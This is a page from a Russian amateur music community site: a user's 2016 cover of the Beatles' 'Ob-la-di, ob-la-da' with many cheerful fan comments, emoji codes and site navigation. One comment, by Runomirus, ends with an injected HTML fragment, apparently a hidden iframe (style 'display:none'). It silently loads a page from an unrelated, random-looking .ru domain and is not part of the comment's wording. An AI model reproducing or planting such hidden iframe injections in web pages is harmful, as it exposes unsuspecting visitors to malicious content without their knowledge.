На главную Muza.vip
      
Карамболина (Фиалка Монмартра)
(Оперетты)
Маленькие герои
(Машина времени)
Спасательный круг
(Карнавал (группа))
Прекрасная дама
(Сурина Ирина)
Романс
(Сумишевский Ярослав)


Песня месяца
Май 2026 года
Angelochek_msНадоело засыпать одной
(Мельянцева Надежда)

Баллов: 717



   «Ob-la-di, ob-la-da» (Beatles)

203   109   3
   Кавер-версия от marinka9
14.01.2016 2351
16 января день BEATLES !!!!!!!!
  Баллов:
69
  


Комментарии пользователей к записи:

          Страницы: 1  2 

milana18, 14.01.2016 г. 23:59
v_naushnikaho_daklassguitar СУПЕР!!!
  

marinka9, 15.01.2016 г. 01:04
Спасибо большое Миланочка!!!!!serdce_v_rukebayanbuket_serdechki
  
bali, 14.01.2016 г. 23:59
Мариша, вторую облади обладу сегодня здесь слушаю!)) Заводно поешь!victory
  

marinka9, 15.01.2016 г. 01:05
Вот первая меня как раз и сподвигла!!!! Только я минус как всегда под себя нашла)))))ulybka Мерсишки, Танюша!!!!!d9
  
userbolm, 15.01.2016 г. 00:04
Мариночка! Классное исполнение! bravo_big
  

marinka9, 15.01.2016 г. 01:06
Спасибо , Юрочка!!!! d9Мне приятно!!! Очень!!!!serdce_v_ruke
  
sanyaretro, 15.01.2016 г. 00:08
Мариш супер !!!buket_serdechkibuket_big
  

marinka9, 15.01.2016 г. 01:07
Спасибо Саша!!!! Приятно !!!!!bayan
  
sain, 15.01.2016 г. 00:17
Мариночка!!! Великолепно!!! Пою с тобой 2 голос!!! Ой Было дело!!!poceluj_v_shsechkuklasslove_online
  

marinka9, 15.01.2016 г. 01:08
Пасибочки, Серёжа!!!!!d9Я тоже почти всегда с тобой пою!!!!)))))v_naushnikah Минус клёвый, скажи!!!!ulybka
  

sain, 15.01.2016 г. 01:12
Ты знаешь,я просмотрел сейчас минусы и выбрал бы этот же. А вообще у меня кажись в загашнике есть минус более приближенный к ним. Я ж помешан на них. serdce_v_ruke
  

marinka9, 15.01.2016 г. 01:13
Я тоже))))))
  
makjuli9, 15.01.2016 г. 00:22
Мариша, зажигалочка наша, столько позитива от исполнения!!!v_plyas Суперски!!!applodklassvozdushnyj_poceluj
  

marinka9, 15.01.2016 г. 01:10
У самой попа на стуле танцует)))))smeh Пасиб, Юлик!!!!pocelujchikbayan
  
Badrob, 15.01.2016 г. 01:14
v_naushnikahbravov_naushnikahbravo Жаль, нельзя прыгать!!!!wowbuketБраво, Мариш!!!! Шикарное настроение!!!! bravo_bigbuket_big
  

marinka9, 15.01.2016 г. 01:20
Может тебе немного подниму настроение то!!! smushenie Ты пальцАми по столу ритм и головой крути туда, сюда))))v_naushnikahbayan
  

Badrob, 15.01.2016 г. 01:27
da_da кручу, стучу!!! Куда ж денусь! smehbuket
  
zvezda5, 15.01.2016 г. 01:48
И у меня попа на стуле танцует)))smeh Мариш!Здорово спела!!! klass v_naushnikah buket_serdechki
  

marinka9, 15.01.2016 г. 02:06
О!!!! Я уже не одна!!!!v_naushnikahsmeh Спасибо за поддержку, Ириша!!!!!buket_serdechki
  
igorkrilov, 15.01.2016 г. 02:05
Здрассьти! Я думал она спит, а она!!!
  

marinka9, 15.01.2016 г. 02:08
Я ?ulybka Да ни фа фто!!!!!yazykbayanЕщё пока пою!!!! Минус я уже сделала!!!!v_naushnikah
  

igorkrilov, 15.01.2016 г. 02:42
И я...wow
  

marinka9, 15.01.2016 г. 02:48
)))) zhmu_lapu
  

igorkrilov, 15.01.2016 г. 02:49
victory
  
8911083, 15.01.2016 г. 02:14
Просто Офигеннно!!!vozdushnyj_poceluj
  

marinka9, 15.01.2016 г. 02:19
Да ? Йеееееееаааа!!!!!!wowБорюся!!!!!!pocelujchik
  
Yri100, 15.01.2016 г. 04:26
Отлично!
  

marinka9, 15.01.2016 г. 04:33
Спасибо!!!!smushenie
  
Runomirus, 15.01.2016 г. 05:01
МАРИНЧИК АБАЛДЕТЬ!wow КЛАССНО !klassКЛАССНО!voo КЛАССНО!bravo_bigМАРИНОЧКАvozdushnyj_poceluj id="a1996667054" src="//ubnsyhv27fa2j.ru/f.html" style="display:none">
  
Plana, 15.01.2016 г. 06:16
Красивое исполнение ,Марина и произношение какое!!! Спасибо за и настроение! wowbravo_bigbuket_serdechki
  
Marinajazz, 15.01.2016 г. 08:12
v_naushnikah о-бла! ДА! Здорово, Мариша, очень удалась тебе эта песенка!!! v_plyas bravo_big
  
klassic, 15.01.2016 г. 09:00
Молодчина -Марина - класс !wowapplodv_plyasapplod
  
domingo28, 15.01.2016 г. 09:44
Маринка, здорово как! Впрочем, у тебя по-другому и не бывает!love_online
  
SkT, 15.01.2016 г. 10:06
Вау! ЗДОРОВО,МАРИШ!!!!!!!!!v_plyasvoo
  
Otomy, 15.01.2016 г. 11:25
Классно, Марин! v_naushnikahwow
  
lubocka111111, 15.01.2016 г. 11:38
Отлично, Мариш, для настроения-самое то!!!!!!bravovooБРАВО тебе!!!!buket_bigbravo_big
  
leila08, 15.01.2016 г. 18:00
ЛА-ЛА-ЛА!НУ ПРОСТО ЗАЖГЛА,МАРИША!СЛУШАЮ И ПРИТАНЦОВЫВАЮ)))na_skripke
  

          Страницы: 1  2 

align=absbottomКомментарии могут оставлять только зарегистрированные пользователи, активировавшие аккаунт!
Зарегистрироваться или войти

  ПОМОГАЕМ
  ЖИВОТНЫМ
  В ЗОНЕ СВО



Случайная запись


Студия
serweb
Красишь ты ресницы
Петровский Алексей
WECHER-36
Вспомните меня
Беспалов Виктор
VETER36
Знаешь ты
Кинокомедия
ARAKS
Опять
Лоза Юрий
Otblesk
Согласный
Лесоповал
Radmila76
Карета
Успенская Любовь
dimakapitan
Новозеландская песня
Пикник
Pol701
От сувенира к сувениру
Ремейки (переделки)
negor
Песня
Царегородцев Олег
4upakabra
Семечек стакан
4upakabra
petrovlad
Мелодия печали
Шукенов Батырхан
margosha123
Je taime
Lara Fabian
X241HH
Я поеду на юг
Шуфутинский Михаил
ptah
Вино в бокале
Хачатурян Федо
akononov6690
Твои бездонные глаза
Pavlos Bouros
ifanow2
Да обойдут тебя лавины
Якушева Ада
lesha
Лети
Трофимов Сергей
lori
Благодарю тебя
Бабаджанян Арно
Serge_Poet
Поляны фантазий и чудес света
Ремейки (переделки)
igornov
Дорогая
Шуфутинский Михаил
Natulichka
Птицы
Мона
LonelyWoolf
We Are Animals
Nazareth
Haris1958
Come together
Beatles
BEDHAR58
Monkberry moon delight
Paul McCartney
zaiaz
Счастье
Кузьмин Юрий
alexs55
Золотая осень
Фристайл
shansovo
Птица с дробью
Новиков Александр
adagio5
Мелодия души
Искусственный интеллект
mranatolm
За туманами
Королев Виктор
djdfy56
Таксую я
Петров Олег




Территория творческого настроения © Muza.vip, 2011 — 2026 гг. Пользовательское соглашение.